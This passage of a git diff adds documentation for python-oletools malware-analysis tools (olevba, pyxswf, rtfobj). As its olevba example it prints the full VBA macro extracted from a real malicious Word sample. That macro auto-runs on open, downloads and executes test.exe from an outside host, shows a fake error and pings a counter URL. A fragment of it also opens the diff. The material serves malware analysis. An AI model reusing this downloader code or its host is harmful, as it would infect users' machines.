+ lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
+ Application.DisplayAlerts = False
+ Application.Quit
+End Function
+Sub Workbook_Open()
+ Auto_Open
+End Sub
+How to use olevba in Python applications
+TODO
+
+
+
+
+
diff --git a/oletools/doc/olevba.md b/oletools/doc/olevba.md
new file mode 100644
index 0000000..823e461
--- /dev/null
+++ b/oletools/doc/olevba.md
@@ -0,0 +1,90 @@
+olevba
+======
+
+olevba is a script to parse OLE and OpenXML files such as MS Office documents
+(e.g. Word, Excel), to extract VBA Macro code in clear text.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+Supported formats:
+
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 2007+ (.pptm, .ppsm)
+
+olevba is based on source code from [officeparser](https://github.com/unixfreak0037/officeparser) by John William Davison
+
+## Usage
+
+ :::text
+ olevba.py
+
+### Example
+
+Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
+
+ :::text
+ >olevba.py DIAN_caso-5415.doc
+
+ INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
+
+ -------------------------------------------------------------------------------
+ ThisDocument.cls
+
+ Attribute VB_Name = "ThisDocument"
+ Attribute VB_Base = "1Normal.ThisDocument"
+ Attribute VB_GlobalNameSpace = False
+ Attribute VB_Creatable = False
+ Attribute VB_PredeclaredId = True
+ Attribute VB_Exposed = True
+ Attribute VB_TemplateDerived = True
+ Attribute VB_Customizable = True
+ Option Explicit
+ Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
+ ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+ ByVal HQTLDG As Long) As Long
+ Sub AutoOpen()
+ Auto_Open
+ End Sub
+ Sub Auto_Open()
+ SNVJYQ
+ End Sub
+ Public Sub SNVJYQ()
+ OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
+ End Sub
+ Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+ Dim HRKUYU, lala As Long
+ HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+ If HRKUYU = 0 Then OGEXYR = True
+ Dim YKPZZS
+ YKPZZS = Shell(PHHWIV, 1)
+ MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
+ lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
+ Application.DisplayAlerts = False
+ Application.Quit
+ End Function
+ Sub Workbook_Open()
+ Auto_Open
+ End Sub
+
+## How to use olevba in Python applications
+
+TODO
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/pyxswf.html b/oletools/doc/pyxswf.html
new file mode 100644
index 0000000..41ed4b3
--- /dev/null
+++ b/oletools/doc/pyxswf.html
@@ -0,0 +1,78 @@
+
+
+
+
+
+
+
+
+
+pyxswf
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis.
+It is part of the python-oletools package.
+pyxswf is an extension to xxxswf.py published by Alexander Hanel.
+Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/
+It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
+For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
+Usage
+Usage: pyxswf.py [options] <file.bad>
+
+Options:
+ -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
+ in each stream
+ -f, --rtf Parse an RTF file to look for SWF in each embedded
+ object
+ -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
+ saves it in the working dir. No addition args needed
+ -h, --help show this help message and exit
+ -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
+ compressed it will be deflated. No addition args
+ needed
+ -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
+ checkMD5 to define hashes. No addition args needed
+ -H, --header Displays the SWFs file header. No addition args needed
+ -d, --decompress Deflates compressed SWFS(s)
+ -r PATH, --recdir=PATH
+ Will recursively scan a directory for files that
+ contain SWFs. Must provide path in quotes
+ -c, --compress Compresses the SWF using Zlib
+Example 1 - detecting and extracting a SWF file from a Word document on Windows:
+C:\oletools>pyxswf.py -o word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+
+C:\oletools>pyxswf.py -xo word_flash.doc
+OLE stream: 'Contents'
+[SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
+C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+RTF embedded object size 1498557 at index 000036DD
+[SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
+00036DD
+ [ADDR] SWF 1 at 0xc40 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+How to use pyxswf in Python applications
+TODO
+
+
+
+
+
diff --git a/oletools/doc/pyxswf.md b/oletools/doc/pyxswf.md
new file mode 100644
index 0000000..8f2e331
--- /dev/null
+++ b/oletools/doc/pyxswf.md
@@ -0,0 +1,92 @@
+pyxswf
+======
+
+pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may
+be embedded in files such as MS Office documents (e.g. Word, Excel),
+which is especially useful for malware analysis.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+pyxswf is an extension to [xxxswf.py](http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html) published by Alexander Hanel.
+
+Compared to xxxswf, it can extract streams from MS Office documents by parsing
+their OLE structure properly, which is necessary when streams are fragmented.
+Stream fragmentation is a known obfuscation technique, as explained on
+[http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/](http://www.breakingpointsystems.com/resources/blog/evasion-with-ole2-fragmentation/)
+
+It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option).
+
+For this, simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.
+
+## Usage
+
+ :::text
+ Usage: pyxswf.py [options]
+
+ Options:
+ -o, --ole Parse an OLE file (e.g. Word, Excel) to look for SWF
+ in each stream
+ -f, --rtf Parse an RTF file to look for SWF in each embedded
+ object
+ -x, --extract Extracts the embedded SWF(s), names it MD5HASH.swf &
+ saves it in the working dir. No addition args needed
+ -h, --help show this help message and exit
+ -y, --yara Scans the SWF(s) with yara. If the SWF(s) is
+ compressed it will be deflated. No addition args
+ needed
+ -s, --md5scan Scans the SWF(s) for MD5 signatures. Please see func
+ checkMD5 to define hashes. No addition args needed
+ -H, --header Displays the SWFs file header. No addition args needed
+ -d, --decompress Deflates compressed SWFS(s)
+ -r PATH, --recdir=PATH
+ Will recursively scan a directory for files that
+ contain SWFs. Must provide path in quotes
+ -c, --compress Compresses the SWF using Zlib
+
+### Example 1 - detecting and extracting a SWF file from a Word document on Windows:
+
+ :::text
+ C:\oletools>pyxswf.py -o word_flash.doc
+ OLE stream: 'Contents'
+ [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+
+ C:\oletools>pyxswf.py -xo word_flash.doc
+ OLE stream: 'Contents'
+ [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
+ [ADDR] SWF 1 at 0x8 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+
+### Example 2 - detecting and extracting a SWF file from a RTF document on Windows:
+
+ :::text
+ C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
+ RTF embedded object size 1498557 at index 000036DD
+ [SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
+ 00036DD
+ [ADDR] SWF 1 at 0xc40 - FWS Header
+ [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
+
+
+
+## How to use pyxswf in Python applications
+
+TODO
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/rtfobj.html b/oletools/doc/rtfobj.html
new file mode 100644
index 0000000..03c3c74
--- /dev/null
+++ b/oletools/doc/rtfobj.html
@@ -0,0 +1,42 @@
+
+
+
+
+
+
+
+
+
+rtfobj
+rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.
+It is part of the python-oletools package.
+Usage
+rtfobj.py <file.rtf>
+It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+How to use rtfobj in Python applications
+Usage as a python module:
+rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
+Example:
+import rtfobj
+for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+ print 'found object size %d at index %08X' % (len(data), index)
+
+
+
+
+
diff --git a/oletools/doc/rtfobj.md b/oletools/doc/rtfobj.md
new file mode 100644
index 0000000..4e002ea
--- /dev/null
+++ b/oletools/doc/rtfobj.md
@@ -0,0 +1,47 @@
+rtfobj
+======
+
+rtfobj is a Python module to extract embedded objects from RTF files, such as
+OLE ojects. It can be used as a Python library or a command-line tool.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+## Usage
+
+ :::text
+ rtfobj.py
+
+It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
+
+
+
+## How to use rtfobj in Python applications
+
+Usage as a python module:
+
+rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
+
+Example:
+
+ :::python
+ import rtfobj
+ for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
+ print 'found object size %d at index %08X' % (len(data), index)
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
+
+
+